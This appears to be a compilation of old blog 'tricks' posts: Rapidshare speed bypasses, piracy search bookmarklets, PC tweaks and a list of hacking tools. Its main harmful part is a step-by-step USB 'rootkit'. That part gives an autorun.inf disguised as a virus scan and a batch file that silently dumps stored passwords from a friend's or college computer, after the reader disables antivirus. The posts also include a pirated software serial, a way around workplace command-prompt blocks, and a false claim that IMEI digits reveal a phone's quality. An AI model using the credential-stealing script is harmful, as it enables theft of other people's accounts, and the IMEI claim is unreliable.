PREMIUM RS SPEED WITH FREE A/C

The trick is for Firefox...

What we will be doing is using Javascript to get high speed downloads from Rapidshare for free.We will still be using the "free user" link and will still need to wait the 120 seconds for it to begin, but when it does start, we should be getting download speeds of a premium user and we should be able to instigate multiple downloads.

Firstly you need Firefox, if you don't have it, get it for this alone.
Secondly we need the Greasemonkey plugin.
Get it here: http://www.greasespot.net/
Now go to this link http://rapidshare.com/files/150086947/Bingo-bango.rar
This is a zipped javascript code. Unzip it to wherever you need.

In Firefox, click File, Open File. Find that file and open it, click install.Ok that's it! Done!
Now find a RS link (I haven't got this to work on RS user directries as of yet) and go to the site.
Accept any messages that come on screen, and don't change any options.

Now RS will look a little different.Wait for the countdown to finish and a pop-up will appear, click OK and then click "Create Link" Finally click "Download Link".

If the countdown does not appear then just hit "Create Link" straight away and all should work immediately.There you have it - Premium speed downloads at no and I mean NO cost to yourself.

Try to keep it updated daily and if it stops working, a fix is being performed, so keep updating until it works. Should you need to uninstall for any reason, click tools, greasemonkey, manage user scripts.The uninstall button is at the bottom.

Hope You Liked The Article...

Video tutorials for Java

Video tutorials for Java--Best academics POST

Introduction
Course Introduction (03:13)
What is Java? (05:43)
What You Will Need (04:08)
A Few Important Words (03:33)
The Command Line Installation (05:30)
Course Overview (04:09)

Two Programs Named Howdy
The Source Code of Howdy (05:20)
Compiling and Running Howdy (02:58)
The Source Code of a Howdy Window (04:04)
Compiling and Running Howdy Window (02:24)
Adding Exits to Howdy Window (03:24)

Drawing Text in a Window
Font Anatomy (04:02)
Positioning Text Version pt. 1 (05:28)
Positioning Text Version pt. 2 (06:06)
Positioning Text Version pt. 3 (04:34)
Garbage Collection (03:47)
Selecting Fonts (05:33)
Selecting Colors (07:02)

A Few Language Fundamentals
The Arithmetic Data Types (06:03)
More Fundamental Data Types (03:42)
Operators (06:39)
The String Class (06:05)
Arrays (03:28)
If and Conditionals (04:53)
Looping (05:19)
Listing Fonts (03:44)

Classes, Data, and Access
Methods/Arguments/Returns (03:30)
Fundamental Inheritance (05:50)
The Sun Documentation (07:52)
The Creation of an Object (04:00)
More About Constructors (03:52)
Access (04:58)

Drawing and Painting
Drawing Rectangles (03:54)
Filling Rectangles (03:49)
Drawing and Filling Circles (03:36)
The Rounded Rectangle (05:53)
Drawing and Filling Arcs (04:34)
Inventing a Shape of Your Own (04:26)
Rectangle with a Beveled Edge (06:10)
Simple Color Shading (03:57)
The Checkerboard and Shading Problems (05:26)
Two Checkerboard and Shading Solutions (06:32)

Graphic Files
Loading a Graphic File from Disk (05:03)
Displaying a Graphic Image (04:52)
Loading a Graphic File from the Internet (04:07)
Scaling Images (04:26)
Drawing in Memory (05:00)
Picture Checkerboard Problem (03:16)
Picture Checkerboard Solution (04:40)
Simple Animation Threads (04:43)
A Simple Thread Example (04:33)
A Simple Animation (06:46)
Overcoming the Flicker Problem (05:01)
Pong Program One (05:56)
Pong Program Two (06:46)
The Switch and Case Statement (05:21)
The Doomed Vessel (05:39)

Introduction to Applets
Applet Fundmentals (05:50)
The Constructor and Init (05:10)
An Applet is a Creature of the Internet (03:57)
Creating a Production Applet (04:40)
Animated Applet Structure (03:51)
One Bouncing Ball (05:53)
Random (04:05)
One Hundred Bouncing Balls (06:38)
The Autumn Leaves Applet (07:10)

Responding to the Mouse
Java Interfaces (07:20)
A Simple Mouse Clicker (04:59)
Moving an Object in a Window (03:53)
Dragging an Object in a Window (05:43)
Dragging a Returning Object in a Window (03:54)

Components
Components and the AWT (04:36)
Placing Buttons in Panel (04:43)
Listening to Buttons in a Panel (03:56)
Poking Text into a Label (03:53)
A Choice is for Making a Selection (04:59)
A List is for Making a Selections (06:28)
A Text Field is for Typing (05:23)
Toggles Turn On and Off (05:59)

Placing Components in a Window
Containers and Layout Managers (05:52)
The Border Layout Manager (04:28)
The Grid Layout Manager (03:40)
The GridBag Layout Manager pt. 1 (04:58)
The GridBag Layout Manager pt. 2 (04:12)
The Card Layout Manager (04:25)
The XY Layout Manager (06:55)

Dialogs and Menus
A Non-Modal Dialog (03:47)
A Modal Dialog (05:10)
A Messaging Dialog (07:25)
A Menu on a Frame (06:58)

Wrap Up
Command Line Options for Javac (05:18)
Command Line Options for Java (04:55)

DOWNLOAD LINK.....

http://rapidshare.com/files/18312759/Introduction_to_Java.part1.rar
http://rapidshare.com/files/18310260/Introduction_to_Java.part2.rar

Download anything from google

Download anything from google:-

Songs
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER ARTIST OR SONG
NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+mp3+
OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

E-book
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book
name:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+pdf+OR
+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE
NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+jpg+OR
+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE
NAME:',''))};if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+avi+OR
+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER app NAME(CREATED BY
5ury4;if(Qr)location.href='http://www2.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+zip+OR+rar
+OR+exe+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N''

Just copy from javascriot and paste this on u r add bar and enter the details and Enjoy!

Check Your Cell's Quality

MUST SEE!!! CHECK YOUR CELL'S QUALITY!!!

Would you like to know your mobile is original or not?

Press *#06# on ur mobile.
After you enter the code you will see a new code contain 15 digits:
4 3 4 5 6 6 1 0 6 7 8 9 4 3 5

IF the digit number Seven & Eight is 02 or 20 that mean it was Assembly on
Emirates which is very Bad quality

IF the digit number Seven & Eight is 08 or 80 that mean it¢s manufactured
in Germany which is not bad

IF the digit number Seven & Eight is 01 or 10 that mean it¢s manufactured in
Finland which is Good

IF the digit number Seven & Eight is 00 that mean it was manufactured in
original factory which is the best Mobile Quality [Like N-Series] ...

IF the digit number Seven & Eight is 13 that mean it was Assembly on
Azerbaijan which is very Bad quality and very dangerous for health!!! throw it away...

Real Facts From a very trusted Source...

View Contents of RAR or ZIP file before Downloading

VIEW CONTENTS OF RAR OR ZIP B4 DOWNLODING

Most of the files we download from the Internet are in Zip or Rar format. We wouldn’t like if we download an archive to find that the file we are looking for is not there. And it is also such a waste of Bandwidth and time to download a whole archive just for a single file. Archview is a Firefox addon that lets you preview the contents of an Archive before downloading. And using it you can even download a single file from the archive.

Currently it supports only RAR, ZIP and ISO format but that should be enough as they are the 2 most popular and common formats being used today. Archview adds itself to the stats bar and becomes active when the user clicks on a zip or rar link. It displays the contents almost instantly and presents the files of the archive in an XML or HTML interface. And what’s more, it even lets you download individual files for an archive, now no need to download a 10 MB archive for a file of 100 Kb that is inside.

The future version will also add support for the 7z format. It supports Firefox 2 and Firefox 3. It is definitely a great add on that can save you a lot of bandwidth.

Link:

https://addons.mozilla.org/en-US/firefox/addon/5028

Screen Shot:

https://addons.mozilla.org/en-US/firefox/images/p/14140/1180087129

Right click to close cd tray

Right click to close cd tray

It works in windows XP (sp1/sp2-haven't tried with sp3 yet) It's around 40kb in size.

http://rapidshare.com/files/171089530/close_cd_tray.rar.html

1. Open cdeject and copy dll to system32 (windows/system32)

2. Open insert reg and click Insert_Reg.reg

That's it. No installing a program. Simple and sweet.
Now you have a new eject/insert cd option.

Note: the old eject cd option is still there but the new one changes from eject to insert as appropriate.

Hack passwords using USB Drive

How to hack passwords using USB Drive???


As we all know, Windows stores most of the passwords which are used on a daily basis,
including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack passwords
from your friend’s/college Computer.

We need the following tools to create our rootkit:

MessenPass:

Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

MessenPass: http://www.nirsoft.net/utils/mspass.html

Mail PassView:

Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

Mail Passview: http://www.nirsoft.net/utils/mailpv.html

IE Passview:

IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

http://www.nirsoft.net/utils/internet_explorer_password.html

Protected Storage PassView:

Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

Protected Storage PassView: http://www.nirsoft.net/utils/pspv.html

PasswordFox:

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.


PasswordFox: http://www.nirsoft.net/utils/passwordfox.html


STEPS==>

NOTE: You must temporarily disable your antivirus before following these

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
i.e. Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
-----------------------------------
Save the Notepad and rename it from New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
--------------------------------------

Save the Notepad and rename it from New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer.

Just follow these steps:--

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds).

The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Edit Websites

Edit Websites

Yes, you can edit any web-page of any websites just for fun or impress your friends. You can edit and delete any stuff. You did not need any html knowledge to edit any web-page online. Just follow these simple steps.

1. Open your web browser.

2. Go to the web-page which you want to edit.

3. In the address-bar of your browser just copy the below script

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0


4. Press Enter.

Now go to the web-page and do whatever you want. You can replace, edit and delete the things.
By using this trick you can even copy pictures on some restricted sites like orkut.

Comments Are Welcome ... If You Like The Post Plzzz Do Comment ...

Ultimate PC Speed-up and Optimization

ULTIMATE PC SPEED UP AND OPTIMIZATION

Slow computer? Not after this tutorial it won't be.
Included will be various tweaks and downloads.

FOLLOW THESE STEPS IN ORDER!

This will take quite some time, but will be very worth it

Removal

Download 'Revo Uninstaller'[http://download.cnet.com/Revo-Uninstaller/3000-2096_4-10687648.html]
Once installed, configure it as such:
Options > Tick 'Advanced Mode'
Options > Uninstaller > Tick bottom box only
Now you can uninstall everything you don't need, If there is something you do not recognize, Right click > 'Search at Google for' If it's made by Microsoft/Apple, Do not remove it!
Choose 'Advanced' when you uninstall software, And make sure you delete every Registry entry and leftover file found.
Ok, done?

Updating

Download File Hippo Update Checker
[http://filehippo.com/updatechecker/]
Run the program, download & install every update found.
Step Three:Optimization
Download Auslogics Boostspeed
[http://download.cnet.com/Auslogics-BoostSpeed/3000-2094_4-10358299.html]
You will need a serial, here it is:
Register ID = Team DVT
Serial = 3835-F87D-9413-E8AE-D58A-83CB-05D2-F201-4452
Ok, lets use Auslogics Boostspeed.
Computer Clean Up
Auslogics Disk Cleaner - Tick all drives - Don't tick 'Use quick Scan'
Auslogics Registry Cleaner - Advanced Registry Scan - Tick all boxes
Auslogics Startup Manager - Straight forward obviously, Turn off unwanted startup programs, I recommend on your AV and Firewall to auto start.

Optimization

Auslogics Disk Defrag - Defragment all drives.
Auslogics Registry Defrag - USE THIS TOOL LAST
Auslogics Internet Optimizer - Straight forward.
Auslogics Memory Optimizer - Use when you boot your PC

Privacy and Security

Auslogics Track Eraser - Find and remove history traces - Tick everything except 'Autocomplete Forms' under your browsers.
Auslogics PC security - Enable Protection - Restart PC later
Auslogics File Shredder - Straight forward
Auslogics Disk Wiper - Straight forward (takes a very long time) Use this when you are not at your PC.

Information and Control

Auslogics Tweak Manager - Go through all the sub-menu's and click optimize then apply.
Auslogics Servive Manager - TAKE CARE WHEN USING THIS! On the services you don't use, or need to auto start, Right click > Start type > Disable. Windows Cardspace and Windows Firewall for example.

Everything else

Firefox user ---> http://howto.helpero.com/howto/Speed-Up-Firefox_31.html
Opera user ---> http://www.worldstart.com/tips/tips.php/3646
Safari user ---> http://www.oreillynet.com/mac/blog/2004/05/speed_up_safari.html
Speeding up menu show delay in Windows:
Start menu > Run > Type 'regedit' (no quotes) > Expand 'HKEY_CURRENT_USER' > Expand 'Control Panel' > Click 'Desktop' > 'Menu show delay' > Value data = 0
Turn off Windows features: Control panel > Programs and Features > 'Turn Windows features on and off' > Untick unused features
Ever got a message 'unable to delete file'?
Download Unlocker
[http://ccollomb.free.fr/unlocker/]

Recommended Firefox extensions:

NoScript ---> https://addons.mozilla.org/en-US/firefox/addon/722
Adblock plus ---> https://addons.mozilla.org/en-US/firefox/addon/1865]
Sxipper ---> https://addons.mozilla.org/en-US/firefox/addon/4865
Other recommended software:
ccleaner ---> http://www.ccleaner.com/
Double Killer ---> http://www.bigbangenterprises.de/en/doublekiller
MaxMem ---> http://majorgeeks.com/MaxMem_d307.html

Other tips:

Computer > C drive > Program files > Delete folders of the software which aren't on your computer.
Start menu > Run > regedit > HKEY_CURRENT_USER > Expand 'Software' > Delete outdated entries
Same can be done under 'HKEY_LOCAL_MACHINE'
*now you can use auslogics registry defrag*

Make Your Own Command Prompt

Make Your Own Command Prompt :


Many businesses and especially government jobs like to block regular users away from the command prompt. This is your way around that creating your own.

All you need is a text editor such as notepad. Do not try this with Microsoft Word.

Step 1 - Copy the following script in noteped:
Quote:
code(surrounded by [])@echo off
cls
:loop
set command=
echo ——————————–
chdir
set /P command=”Prompt: ”
echo ——————————–
%command%
goto loop

Step 2 - Name the file cmd.bat That’s it.

Google Amazing Tricks

GOOGLE AMAZING TRICKS

Go to main google homepage and type any of the following:

xx-bork
xx-klingon
xx-piglatin
xx-hacker
xx-elmer
google bsd
google linux
google easter egg
google scholar
google suggest
early google
elgoog
google moms
google blog search
google heart page
google mentalplex
google zeitgeist
google holiday
google circa

Then, press the "I'm Feeling Lucky" button and see what happens.

SMS spoofing

What is SMS spoofing???

SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product).

How SMS spoofing is carried out?

SMS Spoofing occurs when a fraudster manipulates address information in order to impersonate a user that has roamed onto a foreign network and is submitting messages to the home network. Frequently, these messages are addressed to destinations outside the home network – with the home SMSC essentially being “hijacked” to send messages into other networks.

The impact of this fraud is threefold:

1. The home network can incur termination charges caused by the delivery of these messages to interconnect partners. This is a quantifiable revenue leakage.

2. These messages can be of concern to interconnect partners. Their customers may complain about being spammed, or the content of the messages may be politically sensitive. Interconnect partners may threaten to cut off the home network unless a remedy is implemented. Home subscribers will be unable to send messages into these networks.

3. While fraudsters normally used spoofed-identities to send messages, there is a risk that these identities may match those of real home subscribers. The risk therefore emerges, that genuine subscribers may be billed for roaming messages they did not send. If this situation occurs, the integrity of the home operator’s billing process may be compromised, with potentially huge impact on the brand. This is a major churn risk.

An SMS Spoofing attack is often first detected by an increase in the number of SMS errors encountered during a bill-run.

Great Hacking tools

GREAT HACKING TOOLS

PORT SCANNER :-

Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.
Home:- http://www.insecure.org
Latest Release:- Nmap 4.76
Download:- http://nmap.org/download.html

Superscan :-A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.
Home:- http://www.foundstone.com
Latest Release:- SuperScan v4.0
Download:- http://www.foundstone.com/us/resources/proddesc/superscan4.htm

Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.
Home:- http://www.angryziber.com [sourceforge.net]
Latest Release:- IPScan 3.0-beta3
Download:- http://www.angryziber.com/w/Download

Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.
Home:- http://www.unicornscan.org
Latest Release:- Unicornscan 0.4.7-2
Download:- http://www.unicornscan.org

OS Fingerprint Tools

Nmap :- This tool developed by Fyodor is one of the best unix and windows based active os fingerprinting tool.
Home:- http://www.insecure.org
Latest Release:- Nmap 4.76
Download:- http://nmap.org/download.html

P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more!
Home:- http://lcamtuf.coredump.cx/p0f.shtml
Latest Release:- p0f v2 (2.0.8)
Download:- http://lcamtuf.coredump.cx/p0f.shtml

Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach.
Home:- http://www.sys-security.com [sourceforge.net]
Latest Release:- Xprobe2 0.3
Download:- http://sourceforge.net/projects/xprobe

Password Crackers

Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Home:- http://www.oxid.it
Latest Release:- cain & abel v4.9.23
Download:- http://www.oxid.it/cain.html

John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.
Home:- http://www.openwall.com
Latest Release:- John the Ripper 1.7
Download:- http://www.openwall.com/john/

THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.
Home:- http://www.thc.org
Latest Release:- THC-Hydra v5.4
Download:- http://freeworld.thc.org/thc-hydra/

Pwdump :- Windows password recovery tool.
Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.
Home:- http://www.foofus.net/fizzgig/pwdump
Latest Release:- pwdump6 version 1.7.2
Download:- http://swamp.foofus.net/fizzgig/pwdump/downloads.htm

RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.
Home:- http://www.antsight.com
Latest Release:- rainbowcrack v1.2
Download:- http://www.antsight.com/zsl/rainbowcrack/

Brutus :- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.
Home:- http://www.hoobie.net
Latest Release:- brutus-aet2
Download:- http://www.hoobie.net/brutus/brutus-download.html

Vulnerability Scanners

Nessus :- Premier UNIX vulnerability assessment tool
Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.
Home:- http://www.nessus.org
Latest Release:- Nessus 4
Download:- http://www.nessus.org/download/

GFI LANguard :- A commercial network security scanner for Windows GFI LANguard scans
IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches.
Home:- http://www.gfi.com
Latest Release:- GFI LANguard Network Security Scanner 8
Download:- http://www.gfi.com/lannetscan/

Retina :- Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.
Home:- http://www.eeye.com
Latest Release:- Retina Network Security Scanner v5.15.7
Download:- http://www.eeye.com/html/Products/Retina/index.html

Core Impact :- An automated, comprehensive penetration testing product. it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes.
Home:- http://www.coresecurity.com
Latest Release:- Core Impact 4.0
Download:- http://www.coresecurity.com/

ISS Internet Scanner :- Application-level vulnerability assessment
Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products.
http://www.iss.net/products_services/enterprise_protection
/vulnerability_assessment/scanner_internet.php

SARA :- Security Auditor’s Research Assistant
SARA is a third generation network security analysis tool that Operates under Unix, Linux, MAC OS/X or Windows. The first generation assistant, the Security Administrator's Tool for Analyzing Networks (SATAN) was developed in early 1995. It became the benchmark for network security analysis for several years. However, few updates were provided and the tool slowly became obsolete in the growing threat environment.
Home:- http://www-arc.com
Download:- http://www-arc.com/sara

Packet Sniffers

Ethereal :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.
Home:- http://www.wireshark.org
Latest Release:- Wireshark 1.0.4 (Ethereal)
Download:- http://www.wireshark.org/download.html

Kismet :- A powerful wireless sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.
Home:- http://www.kismetwireless.net
Latest Release:- Kismet-2008-05-R1
Download:- http://www.kismetwireless.net/download.shtml

Tcpdump :- The classic sniffer for network monitoring and data acquisition. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library.
Home:- http://www.tcpdump.org
Latest Release:- TCPDUMP 4.0.0
Download:- http://www.tcpdump.org/

Ettercap :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
Home:- http://ettercap.sourceforge.net
Latest Release:- Ettercap NG-0.7.3
Download:- http://sourceforge.net/projects/ettercap/

DSniff :- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.
Home:- http://www.monkey.org
Latest Release:- dsniff-2.3
Download:- http://www.monkey.org/~dugsong/dsniff/

Encryption Tools

GnuPG / PGP :- Secure your files and communication with the advanced encryption. PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.
http://www.gnupg.org/
http://www.pgp.com/

OpenSSL :- The premier SSL/TLS encryption library. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.
http://www.openssl.org/

Tor :- An anonymous Internet communication system Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
http://tor.eff.org/

Stunnel :- A general-purpose SSL cryptographic wrapper. The stunnel program is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code.
http://www.stunnel.org/

OpenVPN :- A full-featured SSL VPN solution. OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.
http://openvpn.net/

TrueCrypt :- Open-Source Disk Encryption Software for Windows and Linux. TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.
http://www.truecrypt.org/

Cant See Secure Sites

Cant See Secure Sites

Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support )

Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these



regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll


and save it as > all file types, and make it something like securefix.bat.

Then just run the file and ur problem shuld be gone.

Who Used ur PC

Who Used ur PC in ur Absense wat did he do???

First you should go
start > run >eventvwr.msc

Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.

For our purposes we want the System log. Click on "System" in the left-hand column for a list of events. Look for a date and time when you weren't home and your computer should have been off.

Double click on the eg: info and it will show you the detail.

You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day.

Listen Your PDF Files

LISTEN YOUR PDF FILES
Now you can listen to the content of a .pdf document instead of reading the whole document....
Try out the following key combinations:

Combinations for Acrobat 6.0 & 7.0:

ctrl+ shift + b ---> To hear the whole document
ctrl + shift + v ---> To hear only the page
ctrl + shift + c ---> To resume
ctrl + shift + e ---> To stop


Isn't it cool?

Denial of Service Attacks

Denial of Service Attacks

